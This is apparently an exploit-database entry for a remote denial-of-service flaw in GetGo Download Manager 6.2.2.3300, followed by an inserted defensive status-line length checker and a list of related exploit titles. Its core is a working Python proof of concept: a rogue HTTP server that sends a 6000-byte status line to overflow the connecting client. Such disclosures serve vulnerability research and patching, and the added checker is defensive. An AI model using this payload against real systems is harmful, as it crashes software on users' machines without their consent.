"GetGo Download Manager 6.2.2.3300 - Denial of Service"

Author

"Malav Vyas"

Platform

windows_x86-64

Release date

2019-08-16

# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
# Date: 2019-08-15
# Author - Malav Vyas
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
# Vendor Home Page: www.getgosoft.com
# Software Link: http://www.getgosoft.com/getgodm/
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
# Attack Type : Remote
# Impact : DoS
# Co-author - Velayuthm Selvaraj

# 1. Description
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and
# earlier could allow remote NAS HTTP servers to perform a DoS via a long response.

# 2. Proof of Concept

import socket
from time import sleep
host = "192.168.0.112"
port = 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
sock.listen(1)
print "\n[+] Listening on %d ..." % port

cl, addr = sock.accept()
print "[+] Connected to %s" % addr[0]
evilbuffer = "A" * 6000
    
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"

sleep(30)
cl.close()
sock.close()
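
A defensive counterpart to the description above, added here and not part of the original advisory or the vendor's code: a check that a proxy or network sensor could apply to the first line of an HTTP response, rejecting status lines longer than a fixed bound before they reach a client. The 512-byte limit and the name `check_status_line` are assumptions, and the oversized sample is constructed to match the response shape in the PoC.

```python
import re

# Assumed policy bound for a status line; not a value from the advisory.
MAX_STATUS_LINE = 512
# HTTP-version SP 3-digit status SP optional reason phrase
STATUS_LINE = re.compile(rb"HTTP/\d\.\d (\d{3}) [^\r\n]*")


def check_status_line(data, limit=MAX_STATUS_LINE):
    """Classify the first line of a raw HTTP response (bytes).

    Returns (verdict, detail); verdict is ok, oversized, incomplete or malformed.
    """
    # Inspect at most `limit` bytes of line plus its CRLF, so the amount of
    # untrusted data examined is bounded regardless of what arrives.
    window = data[:limit + 2]
    end = window.find(b"\r\n")
    if end == -1:
        if len(data) >= limit + 2:
            return ("oversized", "no CRLF within %d bytes" % limit)
        return ("incomplete", "need more data")
    match = STATUS_LINE.fullmatch(window[:end])
    if match is None:
        return ("malformed", "not a valid status line")
    return ("ok", int(match.group(1)))


if __name__ == "__main__":
    # Constructed samples; the second has the shape of the response in the PoC.
    samples = [
        b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n",
        b"HTTP/1.1 200 " + b"A" * 6000 + b"\r\n",
        b"HTTP/1.1 20",
        b"HTTP/1.1 200OK\r\n",
    ]
    for raw in samples:
        print(len(raw), check_status_line(raw))
```
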
Release Date Title Type Platform Author
2019-08-16 "GetGo Download Manager 6.2.2.3300 - Denial of Service" dos windows_x86-64 "Malav Vyas"
2019-01-28 "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)" remote windows_x86-64 "Matteo Malvica"
2019-01-02 "NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2019-01-02 "NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2019-01-02 "EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)" dos windows_x86-64 Achilles
2018-11-16 "Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-16 "Mumsoft Easy Software 2.0 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-15 "Notepad3 1.0.2.350 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-14 "AMPPS 2.7 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-12 "Mongoose Web Server 6.9 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-12 "CuteFTP 9.3.0.3 - Denial of Service (PoC)" dos windows_x86-64 "Ismael Nava"
2018-11-06 "eToolz 3.4.8.0 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-06 "Blue Server 1.1 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-05 "Softros LAN Messenger 9.2 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-09-27 "Rausoft ID.prove 2.95 - 'Username' SQL injection" webapps windows_x86-64 "Ilya Timchenko"
2018-08-30 "Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting" webapps windows_x86-64 "Emre ÖVÜNÇ"
2018-08-30 "Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal" webapps windows_x86-64 "Emre ÖVÜNÇ"
2018-08-26 "ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting" webapps windows_x86-64 "Ismail Tasdelen"
2018-08-14 "Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)" remote windows_x86-64 "Raymond Wellnitz"
2018-05-28 "CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)" remote windows_x86-64 "Juan Prescotto"
2017-07-24 "Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)" remote windows_x86-64 redr2e
2017-05-17 "Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)" remote windows_x86-64 sleepya
2017-05-10 "Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)" remote windows_x86-64 "Juan Sacco"
2016-06-22 "PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit)" remote windows_x86-64 quanyechavshuo
2014-08-14 "Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit)" remote windows_x86-64 Metasploit
2018-10-29 "School Equipment Monitoring System 1.0 - 'login' SQL Injection" local windows_x86-64 "Ihsan Sencan"
2018-09-28 "PCProtect 4.8.35 - Privilege Escalation" local windows_x86-64 "Hashim Jawad"
2018-09-13 "InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)" local windows_x86-64 "Luis Martínez"
2018-09-11 "InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)" local windows_x86-64 "Luis Martínez"
2018-08-14 "Wansview 1.0.2 - Denial of Service (PoC)" local windows_x86-64 "Gionathan Reale"